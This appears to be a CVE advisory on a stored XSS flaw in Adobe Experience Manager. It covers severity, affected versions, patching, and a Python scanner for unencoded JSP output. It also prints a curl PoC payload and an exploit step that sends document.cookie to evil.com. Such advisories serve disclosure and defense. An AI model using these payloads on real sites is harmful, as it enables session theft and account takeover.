Adobe Experience Manager, Stored XSS, CVE-2026-47962 (Medium) -DC-Jun2026-320


CVE-2026-47962 – A stored cross-site scripting (XSS) vulnerability in Adobe Experience Manager (AEM) allows a low‑privileged attacker to inject arbitrary JavaScript into vulnerable form fields. The injected payload is stored persistently on the server and executes in the browser of any victim who later views the compromised page. The attack can be carried out remotely with low complexity and requires only low privileges (e.g., a contributor or author account); the victim must interact with the malicious page (user interaction required). Because the script runs in the context of the victim’s session, it can steal session cookies, perform actions on behalf of the user, or deface the page. The scope is changed, meaning the vulnerable component (the form field) and the impacted component (the victim’s browser) are different, which increases the potential for lateral movement. The flaw is rooted in improper neutralization of input during web page generation (CWE‑79). Versions 6.5.24, LTS SP1, 2026.04, and all earlier releases are affected. Adobe patched the issue in its June 2026 security update (APSB26‑56). No public exploit or technical details are available as of the disclosure date, but the vulnerability is considered easy to exploit if a low‑privileged account can be obtained. The CVSSv3 base score is 5.4 (MEDIUM) with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N.

DailyCVE Form:

Platform: Adobe Experience Manager
Version: 6.5.24 & earlier
Vulnerability: Stored Cross-Site Scripting
Severity: Medium
Date: 2026-06-09

Prediction: Patch June 10

What Undercode Say:

```shell
# Check the currently installed AEM version
cat /path/to/aem/cq-version.properties | grep "product.version"

# Search the repository for JSP components that read request parameters
# (candidates for unsanitized form fields; "*.jsp" must be quoted so the shell does not expand it)
find /aem/crx -name "*.jsp" -exec grep -l "request.getParameter" {} \;

# Simple PoC payload (manual injection)
curl -X POST -d "comment=<script>alert('XSS')</script>" \
  -H "Cookie: JSESSIONID=..." \
  https://target-aem.com/content/forms/submit
```
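
The `find`/`grep` check above flags every JSP that reads a request parameter, which is noisy. The following added script (not from the advisory or from Adobe) narrows that to `<%= ... %>` expressions that write a request parameter into the page without passing it through an encoding call, i.e. the CWE‑79 pattern behind this class of bug. The JSP fragments are constructed samples, and the encoding method names are assumed from Adobe's Granite XSSAPI (`encodeForHTML`, `filterHTML`, ...).

```python
import re

# Constructed sample JSP fragments (not taken from any real AEM component).
VULNERABLE_JSP = """
<div class="comment">
  <%= request.getParameter("comment") %>
</div>
"""

HARDENED_JSP = """
<div class="comment">
  <%= xssAPI.encodeForHTML(request.getParameter("comment")) %>
</div>
"""

# <%= ... %> expression scriptlets: the body is emitted straight into the HTML response.
EXPRESSION = re.compile(r"<%=\s*(.*?)\s*%>", re.DOTALL)

# Output-encoding calls that neutralise markup before rendering. Names assumed from
# Adobe's XSSAPI (encodeForHTML, encodeForHTMLAttr, filterHTML, getValidHref).
ENCODED = re.compile(r"\b(encodeFor\w+|filterHTML|getValidHref)\s*\(")


def find_unencoded_outputs(jsp_source):
    """Return (line_number, expression) pairs where a request parameter is written
    into the page without an encoding call: candidates for stored/reflected XSS."""
    findings = []
    for match in EXPRESSION.finditer(jsp_source):
        body = match.group(1)
        if "request.getParameter" in body and not ENCODED.search(body):
            line = jsp_source.count("\n", 0, match.start()) + 1
            findings.append((line, body))
    return findings


if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_JSP), ("hardened", HARDENED_JSP)):
        print(label, find_unencoded_outputs(src))
```

The check only sees parameters used directly inside an expression; a value copied into a local variable first (`String c = request.getParameter(...)` then `<%= c %>`) is not caught, so treat a clean result as a starting point for review, not proof of safety.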

Exploit:

1. Attacker authenticates with low‑privileged credentials (e.g., `contributor`).
2. Identifies an AEM form field that does not sanitize user input (e.g., a comment box or profile field).
3. Injects a malicious script, for example `<script>document.location='https://evil.com?cookie='+document.cookie</script>`, into the field.
4. Submits the form; the payload is stored in the repository.
5. Victim navigates to the affected page (e.g., a forum post or user profile).
6. The script executes in the victim’s browser, stealing their session or performing unauthorized actions.

Protection:

  • Upgrade AEM to version 6.5.25, 2026.05, or a later patched release (APSB26‑56).
  • Enable the AEM built‑in XSS protection filter (/libs/granite/security/content/security/config.xml).
  • Apply a Web Application Firewall (WAF) rule to block `